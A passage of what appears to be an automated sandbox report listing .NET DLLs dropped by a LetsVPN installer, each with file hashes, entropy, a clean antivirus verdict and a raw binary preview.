                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q*..........." ..0..x..........^.... ........... ..............................(.....`.....................................O....................... ...........|...8............................................ ............... ..H............text....w... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B................@.......H...........8............................................................{....*..{....*V.(......}......}....*...0..;........u......,/(.....{.....{....o....,.(.....{.....{....o....*.*. Q... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*.0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*..{....*"..}....*..(.....-..rK..p(....*..rY..p(....(....*..0...........#........W~.........~...%.....( ...o!......?........Xo"......X.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SharpCompress.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):465952
                                                                                                                                                                                                  Entropy (8bit):6.223512663085733
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:VcGv7iCPwqEYosfdBtmXaxWoXY06nQk2zLRC+oRZkR4CDy2sqIT0czXDU:x+CoCoCBtmXWnL6nd2ZiUR4WylT0qA
                                                                                                                                                                                                  MD5:944E14779C3757DCB53332A71F2E5ADD
                                                                                                                                                                                                  SHA1:F1F8AED8C6C4BD4E49E5ED2BBF5D2E44B8CB2416
                                                                                                                                                                                                  SHA-256:15C8E0EBC6B5CDFABFE66B535B21F128302243DED742FAC17CB6B4876F39BBBD
                                                                                                                                                                                                  SHA-512:7DB016F3ADE6AF48900B475D31AF9589D95773CC90363FB7366AC5FAEAE7330DE65C25DCE46707A73FE960830EE99112CA3FA7E7EF1CCB972D90FC4DDA2B9E83
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._]..........." ..0.............v.... ... ....... .......................`......e.....`.................................$...O.... .................. ....@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................X.......H........f..D[............................................................(G...*"..(H...*&...(I...*..(....*"..(....*&...(....*r.,.~......~...... ...._X.*.*n.,.~.....~...... ...._X.*.*R..2.~.... .....X.*.*F..2.~.....h.X.*.*R..2.~.... .....X.*.*R..2.~.... .....X.*.*.0..A.........{.......a}......{.......a}......{.......a}......{.......a}....*....0..(..........?_d....1...n_....{.....Y.?_b`.{...._*.0..@..........{.......(....}.......{.......(....}.......{.......(....}....*.0..5...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Squirrel.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):279072
                                                                                                                                                                                                  Entropy (8bit):6.057160854647767
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:abwZzM/arIPizbgQtYYYncnWDOsksHgtBwsbe+/uSO+:ZzM/arIPizxUncQfZHe
                                                                                                                                                                                                  MD5:0C61C76A9B8AF9ADF445838644CF9E3E
                                                                                                                                                                                                  SHA1:0E53E56F6461FB51AC598B0E09646F9BFC840B16
                                                                                                                                                                                                  SHA-256:F15F93D9EFDF561F15CAC6AF006AA1A088E28D41A7499AE62551C4A4B6A2CF85
                                                                                                                                                                                                  SHA-512:75AD643B9FD579856DA7913C554FEFA72526F6B9C1172E7BDBFC58BDB1985DE9C82A5284E36040BA26AD30E606978FDAB36959D5501DC623316997576B101F12
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............*... ...@....... ....................................`.................................e*..O....@.................. ....`......x)..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......X... .............................................................{0...*..{1...*V.(2.....}0.....}1...*...0..;........u......,/(3....{0....{0...o4...,.(5....{1....{1...o6...*.*. ... )UU.Z(3....{0...o7...X )UU.Z(5....{1...o8...X*.0..b........r...p......%..{0......%q.........-.&.+.......o9....%..{1......%q.........-.&.+.......o9....(:...*V!..../c...s;........*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(2...*..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SuperSocket.Clientuser.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):53792
                                                                                                                                                                                                  Entropy (8bit):6.218859181017788
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:DDGXmBiXanx+zehk/WpB/yO0yW3qKm/mT:DDGXmBiXMhkOH/yO9WK/Y
                                                                                                                                                                                                  MD5:A348A1D502F3C891C1F42B43B9F4FE80
                                                                                                                                                                                                  SHA1:C080826E2D494DBA660B58F2AAC564325908624C
                                                                                                                                                                                                  SHA-256:C2B259C89D33CDCE77C235865C59BABD8D19C0D81AF94FA4EB450CC317656303
                                                                                                                                                                                                  SHA-512:F4584975AB126780D0EA42352F9327DB639C5F2A7DA0062811C0DBE7ADFF77C15B37C54FCF68A7B4A6FBA7DFC65423734FDC395B87509D9ED063236D098664F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...h@qZ.........." ..0.............~.... ........... ..............................g.....`.................................*...O....................... ............................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................^.......H........O...g..................(.......................................&...(....*6.......(....*:........(....*...~....%-.&~..........s....%.....(....*..0..@........(....s.......o......}.....s....}.....{......i.....o......}....*.0..............(.....`,.....*...0..Q.........R.{....u......o......{ .......i2...R.*..{.......*.| .....X.(!.......*.........*....0..............("....`,.....*...0............R.{....u......o......{ .....o#......X......i1...R.*..{.......*.| ......(!.....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.AppContext.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.919726757848139
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ADNxWQFWkhqWOHlLf2KQcvBZ9i29XS+ShjmM6IGBkSg:ADNVvq3b2KZBZ7NS+ST6nkr
                                                                                                                                                                                                  MD5:12B94E7812C697C6EFC47CA203ACAF43
                                                                                                                                                                                                  SHA1:297127456EEE356A6D9471FED7AD3901E5D8E9D4
                                                                                                                                                                                                  SHA-256:D6BD67AC706FFC9E6AF619A38435ACAF4E9B218A8916BC6594CE5E878E3EB148
                                                                                                                                                                                                  SHA-512:136440711FB736ABB42029F5D2C42AFF486D5DFADB50FF7C9F7ED5E3BB9A5B44D0FBCD12E1079B520557A95FBA39E2E23A0FF07A11622971045F59340C538FDB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0.............f(... ...@....... ...............................&....@..................................(..O....@.................. ....`.......&............................................... ............... ..H............text...l.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................H(......H.......P ......................\&......................................BSJB............v4.0.30319......l...|...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.....K.N...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Buffers.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23584
                                                                                                                                                                                                  Entropy (8bit):6.770204264572881
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:grMdp9yXOfPfAxR5zwWvYW8ashqWOHlLf2KQcvBZ95c5S+ShjmM6IGBkS0xYm:grMcXP6Pq3b2KZBZgS+ST6nkBxYm
                                                                                                                                                                                                  MD5:D93FEE543469096A52E7A2C6C387BC11
                                                                                                                                                                                                  SHA1:AB0B4E8FB20AE717AD52BB06B77403FAD5B478AE
                                                                                                                                                                                                  SHA-256:F29862B3DFCD861EE5942607AF138F0AA389C12BD29C0C6B9A4B45F363A7118A
                                                                                                                                                                                                  SHA-512:047290C6236FD56A6F10D801DD2CD83E4EDA69FCE82F6FD814713140ECC0ED99048D31526D157DEB4304BA29BC93FA6EA245998D42D7ACCB4D5B524E3580E8BC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$..........BC... ...`....... ...............................!....@..................................B..O....`..@............... ............A............................................... ............... ..H............text...H#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B................$C......H........'...............?..X...8A......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*B.....(.........*R.....(...+%-.&(!...*^.....("....(...+&~....*.s$...*"..s%...*..(&...*.*....0......................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.CodeDom.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):30752
                                                                                                                                                                                                  Entropy (8bit):6.38982790597927
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:wgXxtu5jEIYDhzZpmaq3b2KZBZGS+ST6nkt:wgxt2YDh1pm13qK0/mT
                                                                                                                                                                                                  MD5:ADA23DADD0F2DFC00C48BA3B598F7F0E
                                                                                                                                                                                                  SHA1:EF20B60E66303AB86DCF5D2BC4EA47A425918CAF
                                                                                                                                                                                                  SHA-256:FD1DEFE276BD27F4EE1795972A00ADEED2AB08FF7DF4AAF0A10602C271B847FB
                                                                                                                                                                                                  SHA-512:9E6155AE8BD8E09060442DBDE5EA43331ED7E75D5CF85A74FA333F168F464767E589FBB8065CD74D56C8A2FD1671FB6308E1DF0C587373D32F5C0618FE4B299A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...dP'..........." ..0..>..........*\... ...`....... ..............................b.....`..................................[..O....`...............J.. ............[..T............................................ ............... ..H............text...0<... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............H..............@..B.................\......H........#...)...........L.......Z.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Concurrent.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.010043403341069
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Jm2igOWnW8rWxhqWOHlLf2KQcvBZ95WaS+ShjmM6IGBkSu7Vj:5tCq3b2KZBZLS+ST6nkxVj
                                                                                                                                                                                                  MD5:9DF1738B2AADE4A06E42F8C82D9A5805
                                                                                                                                                                                                  SHA1:D1BE1D4029E07F0DC39D36F4ECDC7A866AE84FDE
                                                                                                                                                                                                  SHA-256:F7CA06EE9ED296CE61E20ADC9589F5AC2008F382339F3F6D5E763F04E9104027
                                                                                                                                                                                                  SHA-512:F4EA572C90FFDDC7A5F9F76887642BB0473982493253AE9DEB5900BC4870179EF4398FE8BE9C7DD6919B939FAF66C3AB1031B08A75E2DEE2FBFF48BA8CB6EFAD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............)... ...@....... ....................................@.................................t)..O....@..D............... ....`......<(............................................... ............... ..H............text........ ...................... ..`.rsrc...D....@......................@..@.reloc.......`......................@..B.................)......H.......P ..l....................'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings....@.......#US.D.......#GUID...T.......#Blob......................3................................................n.o.....o.....\...........8...3.8...P.8.....8.....8.....8.....8.....8.....1.....8.................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.NonGeneric.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.999966721912843
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:enapn1iwwPWcGWHhqWOHlLf2KQcvBZ9ncIS+ShjmM6IGBkS3+:dDupq3b2KZBZuIS+ST6nkA+
                                                                                                                                                                                                  MD5:C724C97C789F51428C7CB5005DFD7FC1
                                                                                                                                                                                                  SHA1:69BF55DDB676112F3F5ABEF38AB997BA4ABE1458
                                                                                                                                                                                                  SHA-256:C3D214484B63E040DE737A4B065A87E3B2DB6072DFA7EDE28F4DDE633C5C09A9
                                                                                                                                                                                                  SHA-512:6765D6F3E4A81B522512C35D9B5DFE9B96552D90E6D7C871E0A0F46E5A309C568CB815B3E92649BB0723233CA629B0A8DA00F0D43BC4007FF51EE30F2C496A47
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ..............................u.....@.................................p)..O....@..@............... ....`......8(............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................)......H.......P ..h....................'......................................BSJB............v4.0.30319......l.......#~..t.......#Strings....<.......#US.@.......#GUID...P.......#Blob......................3................................................F.o.....o.....\...........,.....,...(.,.....,...f.,.....,.....,.....,.....%.....,.................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Specialized.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.005775503871292
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:PHLaEav5aaUa6arWVLWKhqWOHlLf2KQcvBZ9V0S+ShjmM6IGBkSE:+Pv5t/NOTq3b2KZBZcS+ST6nkT
                                                                                                                                                                                                  MD5:DA4200A72DBFE725B71564C24FE16C08
                                                                                                                                                                                                  SHA1:C3CEBDBC20FDB2F941E88809F501255C6312362F
                                                                                                                                                                                                  SHA-256:36573488F5BA2D791A14775E9781DF5FB628F4262887757297874720C281E9B8
                                                                                                                                                                                                  SHA-512:026B7C70AC66FC3A53F48317A6C03EF5A2BE5CB1ECD95A5FF931137AB9E823687FFFDBB29D1E56B852093D6DD081AF29CEAE352C86AFC5B1E0F5D47F728AF3ED
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............)... ...@....... ....................................@..................................)..O....@..P............... ....`......P(............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..........#Strings....T.......#US.X.......#GUID...h.......#Blob......................3..................................................`.....`...t.M.................................=.....V.................q.....Z...................G.....G.....G...).G...1.G...9.G...A.G...I.G...Q.G...Y.G...a.G...i.G...q.G.......................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.874636894850293
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:W6iIJq56dOuWSKeWLhqWOHlLf2KQcvBZ94tUEiS+ShjmM6IGBkS+RJ:AiAdq3b2KZBZCeFS+ST6nkhJ
                                                                                                                                                                                                  MD5:6F94A6ECF59BB9B2F4F7CA404C0E9AA2
                                                                                                                                                                                                  SHA1:39C51481E7AB3B57789E8EB2E56F29F59DF1C9B9
                                                                                                                                                                                                  SHA-256:F2A09948F8B8B80E3BB165BB68936DCB55545E549D8CBE4E64651A253F67625D
                                                                                                                                                                                                  SHA-512:D64CAE00ABD57973B690D304A33568AC5231A43CF57F33353D675788D2F9268C5327569E3024AC5798A6F6F62C9B0A305A337B1A930DF94FFB76BBA8E033CE20
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............*... ...@....... ...............................K....@..................................*..O....@.................. ....`......L)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ..|....................(......................................BSJB............v4.0.30319......l.......#~..|.......#Strings....\.......#US.`.......#GUID...p.......#Blob......................3................................................k.~.....~.....k...........*...0.*...M.*.....*.....*.....*.....*.....*.....#.....*.....x...........e.....e.....e...).e...1.e...9.e...A.e...I.e...Q.e...Y.e...a.e...i.e...q.e.......................#.....+.....3.....;.....C./...K.O...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Annotations.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):38944
                                                                                                                                                                                                  Entropy (8bit):6.044580550740905
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:1XDQsPurQcR3y6JOnSHDYFD5q3b2KZBZKS+ST6nkoc/z:1zPtcE6JhHEFo3qK4/mRb
                                                                                                                                                                                                  MD5:7A2E8A66CF511AFD062CC573C2EF4D8D
                                                                                                                                                                                                  SHA1:D2D5EF3B00E83F19126BC8CD55C96D36F8E60F3C
                                                                                                                                                                                                  SHA-256:9941DF3D31B62A3C32FE3239A4F6BC88A92D688F8F95FD335601186C729F8A36
                                                                                                                                                                                                  SHA-512:45076D97149B394A41D71177F27510BBB2D223C12978EFD21964C18B4FFAACF98F21C07ACD5CCF01EDDC1B51CFB4AA017D0C16F85669D2EC62E350045C78D89E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0..Z..........Bx... ........... ..............................d/....@..................................w..O....................j.. ...........8w............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............h..............@..B................"x......H........$...............R.. $...v......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2r=..p.(....*2r}..p.(....*2r...p.(....*2r...p.(....*2r%..p.(....*2r]..p.(....*2r...p.(....*2r/..p.(....*2r...p.(...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.EventBasedAsync.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.916556938875989
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ynzz+MpSaLWW0+WUhqWOHlLf2KQcvBZ9v6yS+ShjmM6IGBkSlX:kpu8q3b2KZBZDS+ST6nke
                                                                                                                                                                                                  MD5:B86B587463EDAA3768293EDE624B3CD7
                                                                                                                                                                                                  SHA1:EBEA0558A43695AB59EA7F452505CAA2C2F61621
                                                                                                                                                                                                  SHA-256:B1B098D825BC132321187B1C651CA3FB81F5430FCD739166A998459BB35E157A
                                                                                                                                                                                                  SHA-512:DD311019BB290F4D72C431018EE1F5DA966CBC2BADE3C640159E270746F2646E89AD625C0130152BC70AAF89BC89A24AE632821CE36B7F7647FEA8B07B099240
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............B*... ...@....... ..............................0.....@..................................)..O....@.................. ....`.......(............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$*......H.......P ......................8(......................................BSJB............v4.0.30319......l.......#~..t...@...#Strings............#US.........#GUID....... ...#Blob......................3............................................................V...........j.................i...........8.................S.....<...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.'...C.B...K.b...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.968791073790615
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:iGhr+YUfyHxsW/HWJhqWOHlLf2KQcvBZ9zeuBS+ShjmM6IGBkSJmU:Bkmuq3b2KZBZcuBS+ST6nk0mU
                                                                                                                                                                                                  MD5:4EA434032E4ABAE29FFB6623CC92FD24
                                                                                                                                                                                                  SHA1:9851A754766A3DC985969AA1C62C34DB7F3112CF
                                                                                                                                                                                                  SHA-256:B7BA57379B2F6F2DBA310A77A9964A058BE4B125C662F54B415BBB2507A682DF
                                                                                                                                                                                                  SHA-512:63C26140E3AD318142765318D7D5580A0A9A76B1633367D65AFE1CD9A188DE46C5C824D3256F3443A99C97563939728583783676FD8B7D2633D4C9B582DA1E3B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............+... ...@....... ...............................C....@.................................<+..O....@..`............... ....`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................p+......H.......P ..4....................)......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................................Y.]...{.]...6.J...}.....r........... .............................................................D.....D.....D...).D...1.D...9.D...A.D...I.D...Q.D...Y.D...a.D...i.D...q.D.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.TypeConverter.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18464
                                                                                                                                                                                                  Entropy (8bit):6.90329532098987
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:WRE+ruiA5vzWeNWfhqWOHlLf2KQcvBZ910IS+ShjmM6IGBkSh9:WS9bGq3b2KZBZYIS+ST6nkw9
                                                                                                                                                                                                  MD5:D4D0F693EA33F9621E425815A6F9540D
                                                                                                                                                                                                  SHA1:D680AF7B9A988EAE6073AB24FD6F48F69053848D
                                                                                                                                                                                                  SHA-256:0E85C39D139060908AAA9BC221BEC2E5E2CCD19A100CD33A472D1351536713FB
                                                                                                                                                                                                  SHA-512:8711DD683104EAAFA0CE8177C657115436DAD214B90C82F8106AC5DF73626F5CD378304956EA36D58FBF738EF907A0A62D24BE920537C70DE70C9757A25584F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0............../... ...@....... ..............................i.....@................................../..O....@..p............... ....`......T................................................ ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B................./......H.......P .......................-......................................BSJB............v4.0.30319......l.......#~......@...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3................................;.....Y.........8...........<...........P.......................X.....q.....g................."...................I.....I.....I...).I...1.I...9.I...A.I...I.I...Q.I...Y.I...a.I...i.I...q.I.......................#.....+.....3.....;.%...C.@...K.`...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.dll

